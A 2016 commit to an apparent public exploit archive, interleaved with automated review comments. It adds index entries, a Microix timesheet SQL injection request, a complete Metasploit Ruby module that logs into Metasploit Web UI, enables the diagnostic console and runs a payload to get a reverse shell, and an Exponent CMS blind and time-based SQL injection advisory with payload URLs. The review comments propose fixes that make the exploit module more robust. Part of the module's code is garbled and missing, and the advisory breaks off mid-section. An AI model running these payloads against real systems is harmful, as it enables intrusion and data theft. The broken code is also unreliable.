From 12047d93f1888d99943e1a561c838c619dffcb0f Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 23 Sep 2016 05:05:20 +0000 Subject: [PATCH] DB: 2016-09-23 9 new exploits Slackware Linux 3.5 - /etc/group Missing Privilege Escalation Slackware Linux 3.5 - Missing /etc/group Privilege Escalation Matrimonial Website Script 1.0.2 - SQL Injection Metasploit Web UI - Diagnostic Console Command Execution Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection Exponent CMS 2.3.9 - Blind SQL Injection JCraft/JSch Java Secure Channel 0.1.53 - Recursive sftp-get Directory Traversal AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation Kerberos in Microsoft Windows - Security Feature Bypass (MS16-101) phpWebSite 0.10.2 - PHPWS_SOURemote Code Execution_DIR Parameter Multiple Remote File Inclusion phpWebSite 0.10.2 - 'PHPWS_SOURCE_DIR' Parameter Multiple Remote File Inclusion Multiple WordPress Plugins (Using TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution Multiple WordPress Plugins (TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution Microix Timesheet Module - SQL Injection Kaltura Community Edition <=11.1.0-2 - Multiple Vulnerabilities Kaltura Community Edition <= 11.1.0-2 - Multiple Vulnerabilities --- files.csv | 17 +- platforms/aspx/webapps/40407.txt | 32 ++ platforms/multiple/remote/40415.rb | 285 ++++++++++++++++ platforms/php/webapps/40412.txt | 91 ++++++ platforms/php/webapps/40413.txt | 76 +++++ platforms/php/webapps/40414.txt | 507 +++++++++++++++++++++++++++++ platforms/php/webapps/40416.txt | 48 +++ platforms/windows/dos/40411.txt | 236 ++++++++++++++ platforms/windows/local/40409.txt | 38 +++ platforms/windows/local/40410.txt | 42 +++ 10 files changed, 1368 insertions(+), 4 deletions(-) create mode 100755 platforms/aspx/webapps/40407.txt create mode 100755 platforms/multiple/remote/40415.rb create mode 100755 platforms/php/webapps/40412.txt create mode 100755 
platforms/php/webapps/40413.txt create mode 100755 platforms/php/webapps/40414.txt create mode 100755 platforms/php/webapps/40416.txt create mode 100755 platforms/windows/dos/40411.txt create mode 100755 platforms/windows/local/40409.txt create mode 100755 platforms/windows/local/40410.txt
diff --git a/files.csv b/files.csv
index 4b2cca784..164e6f83f 100755
--- a/files.csv
+++ b/files.csv
@@ -16528,7 +16528,7 @@ id,file,description,date,author,platform,type,port
 19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Exploit",1998-07-06,"RSI Advise",linux,remote,0
 19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 - Handling of ISINDEX Query",1998-07-06,"Luz Pinto",multiple,remote,0
 19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 - Exploit",1998-07-08,"Albert Nubdy",multiple,remote,0
-19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - /etc/group Missing Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0
+19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - Missing /etc/group Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0
 19123,platforms/linux/remote/19123.c,"SCO Open Server 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",linux,remote,0
 19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink",1998-07-15,emffmmadffsdf,linux,remote,0
 19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0
@@ -18573,6 +18573,7 @@ id,file,description,date,author,platform,type,port
 21282,platforms/atheos/local/21282.c,"AtheOS 0.3.7 - Change Root Directory Escaping",2002-02-07,Jedi/Sector,atheos,local,0
 21283,platforms/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,multiple,local,0
 21284,platforms/unixware/local/21284.c,"Caldera UnixWare 7.1.1 - Message Catalog Environment Variable Format String",2002-02-07,jGgM,unixware,local,0
+40416,platforms/php/webapps/40416.txt,"Matrimonial Website Script 1.0.2 - SQL Injection",2016-09-22,N4TuraL,php,webapps,80
 21285,platforms/hardware/remote/21285.txt,"HP AdvanceStack Switch - Authentication Bypass",2002-02-08,"Tamer Sahin",hardware,remote,0
 21286,platforms/windows/remote/21286.c,"Apple QuickTime 5.0 - Content-Type Remote Buffer Overflow",2002-02-08,UNYUN,windows,remote,0
 21287,platforms/cgi/remote/21287.pl,"EZNE.NET Ezboard 2000 - Remote Buffer Overflow",2002-02-11,"Jin Ho You",cgi,remote,0
@@ -18830,6 +18831,7 @@ id,file,description,date,author,platform,type,port
 21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection",2012-09-27,otoy,windows,webapps,0
 21547,platforms/windows/local/21547.txt,"Smartfren Connex EC 1261-2 UI OUC - Privilege Escalation",2012-09-27,X-Cisadane,windows,local,0
 21548,platforms/cfm/remote/21548.txt,"ColdFusion MX - Missing Template Cross-Site Scripting",2002-06-13,Macromedia,cfm,remote,0
+40415,platforms/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution",2016-09-22,Metasploit,multiple,remote,0
 21549,platforms/windows/local/21549.txt,"Microsoft SQL Server 2000 - Password Encrypt procedure Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0
 21550,platforms/windows/local/21550.txt,"Lumigent Log Explorer XP - _LogAttach_StartProf Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0
 21551,platforms/windows/local/21551.txt,"Lumigent Log Explorer 3.0.1 - XP_LogAttach_SetPort Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0
@@ -19483,6 +19485,7 @@ id,file,description,date,author,platform,type,port
 22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 - Avatar HTML Injection",2003-02-03,delusion,php,webapps,0
 22212,platforms/linux/local/22212.txt,"QNX RTOS 2.4 - File Disclosure",2001-04-21,teknophreak,linux,local,0
 22213,platforms/windows/remote/22213.txt,"Opera 7.0 - JavaScript Console Attribute Injection",2003-02-04,"GreyMagic Software",windows,remote,0
+40414,platforms/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",php,webapps,0
 22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
 22215,platforms/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
 22217,platforms/windows/remote/22217.txt,"Opera 7 - Image Rendering HTML Injection",2003-02-04,"GreyMagic Software",windows,remote,0
@@ -19585,6 +19588,7 @@ id,file,description,date,author,platform,type,port
 22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0
 22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0
 22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,php,webapps,0
+40413,platforms/php/webapps/40413.txt,"Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80
 22318,platforms/php/webapps/22318.txt,"Webchat 0.77 - Defines.php Remote File Inclusion",2003-03-03,frog,php,webapps,0
 22319,platforms/hardware/remote/22319.txt,"HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure",2003-03-03,"Sven Pechler",hardware,remote,0
 22320,platforms/linux/local/22320.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local,0
@@ -19673,6 +19677,7 @@ id,file,description,date,author,platform,type,port
 22410,platforms/multiple/remote/22410.pl,"ProtWare HTML Guardian 6.x - Encryption",2003-03-21,rain_song,multiple,remote,0
 22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x - banners.php Banner Manager Password Disclosure",2003-03-22,frog,php,webapps,0
 22412,platforms/php/webapps/22412.txt,"Advanced Poll 2.0 - Remote Information Disclosure",2003-03-22,subj,php,webapps,0
+40412,platforms/php/webapps/40412.txt,"Exponent CMS 2.3.9 - Blind SQL Injection",2016-09-22,"Manuel García Cárdenas",php,webapps,80
 22413,platforms/php/webapps/22413.txt,"PHP-Nuke 5.6/6.x News Module - article.php SQL Injection",2003-03-22,frog,php,webapps,0
 22414,platforms/php/webapps/22414.php,"PHP-Nuke 5.6/6.x News Module - 'index.php' SQL Injection",2003-03-23,frog,php,webapps,0
 22415,platforms/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service",2003-03-24,"Piotr Chytla",hardware,dos,0
@@ -19943,6 +19948,7 @@ id,file,description,date,author,platform,type,port
 22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow",2012-11-13,Vulnerability-Lab,windows,dos,0
 22686,platforms/php/remote/22686.rb,"Invision IP.Board 3.3.4 - Unserialize() PHP Code Execution (Metasploit)",2012-11-13,Metasploit,php,remote,0
 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps,0
+40411,platforms/windows/dos/40411.txt,"JCraft/JSch Java Secure Channel 0.1.53 - Recursive sftp-get Directory Traversal",2016-09-22,tintinweb,windows,dos,0
 22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0
 22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0
 22690,platforms/windows/dos/22690.c,"Activity Monitor 2002 2.6 - Remote Denial of Service",2003-05-29,"Luca Ercoli",windows,dos,0
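Review bot: The new 40411 row files the JSch recursive sftp-get directory traversal under platform `windows` and type `dos`, which does not match its own description: JSch is a cross-platform Java library and a traversal during a client-side sftp-get appears to be a file-write/path issue rather than a denial of service. Unless the `dos` bucket is deliberate, `multiple` for platform and whatever type the index uses for client-side traversal bugs would let anyone searching by category actually find it; the other rows added in this and the neighbouring files.csv hunks look consistent with their advisories.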
@@ -20008,6 +20014,7 @@ id,file,description,date,author,platform,type,port
 22751,platforms/multiple/remote/22751.txt,"Mozilla 1.x / opera 6/7 - Timed document.write Method Cross Domain Policy",2003-06-07,meme-boi,multiple,remote,0
 22752,platforms/java/webapps/22752.txt,"H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",java,webapps,0
 22753,platforms/cgi/remote/22753.pl,"MNOGoSearch 3.1.20 - search.cgi UL Buffer Overflow (1)",2003-06-10,pokleyzz,cgi,remote,0
+40410,platforms/windows/local/40410.txt,"AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation",2016-09-22,Tulpa,windows,local,0
 22754,platforms/cgi/remote/22754.pl,"MNOGoSearch 3.1.20 - search.cgi UL Buffer Overflow (2)",2003-06-10,inv,cgi,remote,0
 22755,platforms/multiple/remote/22755.txt,"Aiglon Web Server 2.0 - Installation Path Information Disclosure",2003-06-10,"Ziv Kamir",multiple,remote,0
 22756,platforms/aix/local/22756.pl,"IBM AIX 4.3.x/5.1 - LSMCODE Environment Variable Local Buffer Overflow",2003-06-01,watercloud,aix,local,0
@@ -20078,6 +20085,7 @@ id,file,description,date,author,platform,type,port
 22823,platforms/windows/dos/22823.txt,"Compaq Web-Based Management Agent - Access Violation Denial of Service",2003-06-23,"Ian Vitek",windows,dos,0
 22824,platforms/windows/remote/22824.txt,"Microsoft Windows XP/2000/NT 4 - HTML Converter HR Align Buffer Overflow",2003-06-23,"Digital Scream",windows,remote,0
 22825,platforms/windows/dos/22825.c,"Armida Databased Web Server 1.0 - Remote GET Request Denial of Service",2003-06-23,posidron,windows,dos,0
+40409,platforms/windows/local/40409.txt,"Kerberos in Microsoft Windows - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",windows,local,0
 22826,platforms/php/webapps/22826.txt,"VisNetic WebMail 5.8.6 .6 - Information Disclosure",2003-06-23,posidron,php,webapps,0
 22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent - Remote File Verification",2003-06-23,"Ian Vitek",windows,remote,0
 22828,platforms/php/webapps/22828.txt,"WeBid 1.0.5 - Cross-Site Scripting",2012-11-19,"Woody Hughes",php,webapps,0
@@ -25845,7 +25853,7 @@ id,file,description,date,author,platform,type,port
 28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 - functions.inc.php Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0
 28772,platforms/php/webapps/28772.txt,"ISearch 2.16 - ISEARCH_PATH Parameter Remote File Inclusion",2006-10-09,MoHaNdKo,php,webapps,0
 28773,platforms/php/webapps/28773.txt,"Deep CMS 2.0 - 'index.php' Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0
-28774,platforms/php/webapps/28774.txt,"phpWebSite 0.10.2 - PHPWS_SOURemote Code Execution_DIR Parameter Multiple Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0
+28774,platforms/php/webapps/28774.txt,"phpWebSite 0.10.2 - 'PHPWS_SOURCE_DIR' Parameter Multiple Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0
 28775,platforms/linux/dos/28775.pl,"ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0
 28776,platforms/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps,0
 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x - IMAP SMTP Command Injection",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0
@@ -30556,7 +30564,7 @@ id,file,description,date,author,platform,type,port
 33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST Parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0
 33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0
 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0
-33851,platforms/php/webapps/33851.txt,"Multiple WordPress Plugins (Using TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,php,webapps,0
+33851,platforms/php/webapps/33851.txt,"Multiple WordPress Plugins (TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,php,webapps,0
 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0
 33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0
 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0
@@ -34761,6 +34769,7 @@ id,file,description,date,author,platform,type,port
 38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0
 38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0
 38414,platforms/php/webapps/38414.txt,"WordPress Plugin Feedweb - 'wp_post_id' Parameter Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0
+40407,platforms/aspx/webapps/40407.txt,"Microix Timesheet Module - SQL Injection",2016-09-22,"Anthony Cole",aspx,webapps,0
 38415,platforms/asp/webapps/38415.txt,"C2 WebResource - 'File' Parameter Cross-Site Scripting",2013-04-03,anonymous,asp,webapps,0
 38416,platforms/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross-Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0
 38417,platforms/php/webapps/38417.txt,"Symphony - 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0
@@ -35188,7 +35197,7 @@ id,file,description,date,author,platform,type,port
 38863,platforms/php/webapps/38863.php,"NeoBill - /modules/nullregistrar/PHPwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0
 38864,platforms/php/webapps/38864.php,"NeoBill - /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0
 38865,platforms/php/webapps/38865.txt,"NeoBill - /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0
-39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <=11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80
+39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <= 11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80
 38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
 38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0
 38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
diff --git a/platforms/aspx/webapps/40407.txt b/platforms/aspx/webapps/40407.txt
new file mode 100755
index 000000000..31aee97c9
--- /dev/null
+++ b/platforms/aspx/webapps/40407.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Microix timesheet module SQL Injection
+# Google Dork: "Copyright by Microix" inurl:"/microixcloud/"
+# Date: 2016-09-06
+# Software Link: http://www.microix.net/workflow-modules/timesheet-module/
+# Exploit Author: Anthony Cole
+# Contact: http://twitter.com/acole76
+# Website: http://www.3fforensics.com/
+# CVE:
+# Category: webapps
+
+1. Description
+
+Microix timeclock is vulnerable to a SQL injection. The field that is injectable is:
+
+ctl00$ctl00$ASPxCallbackPanel1Root$ASPxSplitter1$Content$ASPxSplitter2$Content2$ASPxRoundPanel1$ASPxCallbackPanel1$txtUserIDOrBadgeID
+
+Initial contact attempt: 08/22/2016
+2nd attempt: 08/29/2016
+3rd attempt: 09/05/2016
+4th attempt: 09/21/2016
+
+2. Proof of Concept
+
+POST /microixcloud/ HTTP/1.1
+Cache-Control: no-cache
+Content-Type: application/x-www-form-urlencoded
+
+__VIEWSTATE=&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtUserIDOrBadgeID=SQLi&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtPassword=asdsadsad&__CALLBACKID=ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1&__CALLBACKPARAM=c0%3ALogin
+
+
+3. Solution:
+None
\ No newline at end of file
diff --git a/platforms/multiple/remote/40415.rb b/platforms/multiple/remote/40415.rb
new file mode 100755
index 000000000..0345dfc54
--- /dev/null
+++ b/platforms/multiple/remote/40415.rb
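Review bot: The header carries no affected-version field and `# CVE:` is left empty, so a reader cannot tell which Microix builds are exposed or whether the contact attempt dated 09/21/2016 led to a fix; add `# Version: <affected build — placeholder>` (or state explicitly that no patched release was available at publication). The PoC's `__CALLBACKPARAM=c0%3ALogin` with an empty `__VIEWSTATE` indicates the injectable field belongs to the login callback itself, i.e. it appears reachable before authentication, which section 1 should say outright since that drives the severity. `3. Solution: None` would serve defenders better as a short mitigation list: parameterized queries on the vendor side and, until then, restricting `/microixcloud/` to trusted networks and logging login callbacks whose `txtUserIDOrBadgeID` value contains SQL metacharacters.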
@@ -0,0 +1,285 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Metasploit Web UI Diagnostic Console Command Execution', + 'Description' => %q{ + This module exploits the "diagnostic console" feature in the Metasploit + Web UI to obtain a reverse shell. + + The diagnostic console is able to be enabled or disabled by an + administrator on Metasploit Pro and by an authenticated user on + Metasploit Express and Metasploit Community. When enabled, the + diagnostic console provides access to msfconsole via the web interface. + An authenticated user can then use the console to execute shell + commands. + + NOTE: Valid credentials are required for this module. + + Tested against: + + Metasploit Community 4.1.0, + Metasploit Community 4.8.2, + Metasploit Community 4.12.0 + }, + 'Author' => [ 'Justin Steven' ], # @justinsteven + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Arch' => ARCH_CMD, + 'Payload' => { 'PayloadType' => 'cmd' }, + 'Targets' => + [ + [ 'Unix', + { + 'Platform' => [ 'unix' ] + } + ], + [ 'Windows', + { + 'Platform' => [ 'windows' ] + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Aug 23 2016' + )) + + register_options( + [ + OptBool.new('SSL', [ true, 'Use SSL', true ]), + OptPort.new('RPORT', [ true, '', 3790 ]), + OptString.new('TARGETURI', [ true, 'Metasploit Web UI base path', '/' ]), + OptString.new('USERNAME', [ true, 'The user to authenticate as' ]), + OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]) + ], self.class) + end + + def do_login() + + print_status('Obtaining cookies and authenticity_token') + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'login'), + 
}) + + unless res + fail_with(Failure::NotFound, 'Failed to retrieve login page') + end + + unless res.headers.include?('Set-Cookie') && res.body =~ /name="authenticity_token"\W+.*\bvalue="([^"]*)"/ + fail_with(Failure::UnexpectedReply, "Couldn't find cookies or authenticity_token. Is TARGETURI set correctly?") + end + + authenticity_token = $1 + session = res.get_cookies + + print_status('Logging in') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'user_sessions'), + 'cookie' => session, + 'vars_post' => + { + 'utf8' => '\xE2\x9C\x93', + 'authenticity_token' => authenticity_token, + 'user_session[username]' => datastore['USERNAME'], + 'user_session[password]' => datastore['PASSWORD'], + 'commit' => 'Sign in' + } + }) + + unless res + fail_with(Failure::NotFound, 'Failed to log in') + end + + return res.get_cookies, authenticity_token + + end + + def get_console_status(session) + + print_status('Getting diagnostic console status and profile_id') + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'settings'), + 'cookie' => session, + }) + + unless res + fail_with(Failure::NotFound, 'Failed to get diagnostic console status or profile_id') + end + + unless res.body =~ /\bid="profile_id"\W+.*\bvalue="([^"]*)"/ + fail_with(Failure::UnexpectedReply, 'Failed to get profile_id') + end + + profile_id = $1 + + if res.body =~ / 'POST', + 'uri' => normalize_uri(target_uri.path, 'settings', 'update_profile'), + 'cookie' => session, + 'vars_post' => + { + 'utf8' => '\xE2\x9C\x93', + '_method' => 'patch', + 'authenticity_token' => authenticity_token, + 'profile_id' => profile_id, + 'allow_console_access' => new_console_status, + 'commit' => 'Update Settings' + } + }) + + unless res + fail_with(Failure::NotFound, 'Failed to set status of diagnostic console') + end + + end + + def get_container_id(session, container_label) + + container_label_singular = container_label.gsub(/s$/, "") + + 
print_status("Getting ID of a valid #{container_label_singular}") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, container_label), + 'cookie' => session, + }) + + unless res && res.body =~ /\bid="#{container_label_singular}_([^"]*)"/ + print_warning("Failed to get a valid #{container_label_singular} ID") + return + end + + container_id = $1 + + vprint_good("Got: #{container_id}") + + container_id + + end + + def get_console(session, container_label, container_id) + + print_status('Creating a console, getting its ID and authenticity_token') + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, container_label, container_id, 'console'), + 'cookie' => session, + }) + + unless res && res.headers['location'] + fail_with(Failure::UnexpectedReply, 'Failed to get a console ID') + end + + console_id = res.headers['location'].split('/')[-1] + + vprint_good("Got console ID: #{console_id}") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id), + 'cookie' => session, + }) + + unless res && res.body =~ /console_init\('console', 'console', '([^']*)'/ + fail_with(Failure::UnexpectedReply, 'Failed to get console authenticity_token') + end + + console_authenticity_token = $1 + + return console_id, console_authenticity_token + + end + + def run_command(session, container_label, console_authenticity_token, container_id, console_id, command) + + print_status('Running payload') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id), + 'cookie' => session, + 'vars_post' => + { + 'read' => 'yes', + 'cmd' => command, + 'authenticity_token' => console_authenticity_token, + 'last_event' => '0', + '_' => '' + } + }) + + unless res + fail_with(Failure::NotFound, 'Failed to run command') + end + + end + + def exploit + + session, 
authenticity_token = do_login() + + original_console_status, profile_id = get_console_status(session) + + unless original_console_status + set_console_status(session, authenticity_token, profile_id, true) + end + + if container_id = get_container_id(session, "workspaces") + # target calls them "workspaces" + container_label = "workspaces" + elsif container_id = get_container_id(session, "projects") + # target calls them "projects" + container_label = "projects" + else + fail_with(Failure::Unknown, 'Failed to get workspace ID or project ID. Cannot continue.') + end + + console_id, console_authenticity_token = get_console(session, container_label,container_id) + + run_command(session, container_label, console_authenticity_token, + container_id, console_id, payload.encoded) + + unless original_console_status + set_console_status(session, authenticity_token, profile_id, false) + end + + handler + + end + +end \ No newline at end of file diff --git a/platforms/php/webapps/40412.txt b/platforms/php/webapps/40412.txt new file mode 100755 index 000000000..377f8984a --- /dev/null +++ b/platforms/php/webapps/40412.txt 
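Review bot: `exploit` switches the diagnostic console on when it was off, but the restoring `set_console_status(..., false)` at the end is skipped whenever `get_container_id`, `get_console` or `run_command` raises through `fail_with`, so a failed run leaves the console permanently enabled on the target — a lasting configuration change the module description does not mention; wrap the work in `begin`/`ensure` so the original setting is restored on every path (sketch below). `'utf8' => '\xE2\x9C\x93'` is single-quoted in both `do_login` and the `update_profile` POST, so Ruby sends the twelve literal characters rather than the U+2713 check mark the form expects — `"\xE2\x9C\x93"` is what was intended. `$1` is read several statements after the `=~` in `do_login` and `get_console_status`; assigning the capture immediately (or using a named group) avoids it being clobbered by an intervening match. The text between `get_console_status` and that POST is garbled in this rendering (the `set_console_status` signature is missing), so that part could not be reviewed.
```ruby
  def exploit
    session, authenticity_token = do_login()
    original_console_status, profile_id = get_console_status(session)

    enabled_by_module = false
    begin
      unless original_console_status
        set_console_status(session, authenticity_token, profile_id, true)
        enabled_by_module = true
      end
      # … unchanged: workspace/project lookup, get_console, run_command …
    ensure
      # Put the administrator's original setting back even when a step above failed.
      if enabled_by_module
        set_console_status(session, authenticity_token, profile_id, false)
      end
    end

    handler
  end
```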
@@ -0,0 +1,91 @@ +============================================= +MGC ALERT 2016-005 +- Original release date: September 09, 2016 +- Last revised: September 20, 2016 +- Discovered by: Manuel GarcAa CA!rdenas +- Severity: 7,1/10 (CVSS Base Score) +- CVE-ID: CVE-2016-7400 +============================================= + +I. VULNERABILITY +------------------------- +Blind SQL Injection in Exponent CMS <= v2.3.9 + +II. BACKGROUND +------------------------- +Exponent CMS is a free, open source, open standards modular enterprise +software framework and content management system (CMS) written in the +programming language PHP. + +III. DESCRIPTION +------------------------- +This bug was found using the portal in the index.php page. + +To exploit the vulnerability only is needed use the version 1.0 of the HTTP +protocol to interact with the application. + +It is possible to inject SQL code in the "index.php" page +"/exponent/index.php". + +IV. PROOF OF CONCEPT +------------------------- +The following URL have been confirmed to all suffer from Blind SQL +injection and Time Based SQL Injection. + +Blind SQL Injection POC: + +/exponent/index.php'%20or%201%3d1--%20 + +/exponent/index.php'%20or%201%3d2--%20 + +Time Based SQL Injection POC: + +/exponent/index.php'%20OR%20SLEEP(1)--%20 (2 seconds of response) + +/exponent/index.php'%20OR%20SLEEP(30)--%20 (30 seconds of response) + +V. BUSINESS IMPACT +------------------------- +Public defacement, confidential data leakage, and database server +compromise can result from these attacks. Client systems can also be +targeted, and complete compromise of these client systems is also possible. + +VI. SYSTEMS AFFECTED +------------------------- +Exponent CMS <= v2.3.9 + +VII. SOLUTION +------------------------- +Vendor fix the vulnerability: +http://www.exponentcms.org/news/updated-patches-released-for-v2-1-4-and-v2-2-3-1473726129-0.50310400 + +VIII. REFERENCES +------------------------- +http://www.exponentcms.org/ + +IX. 
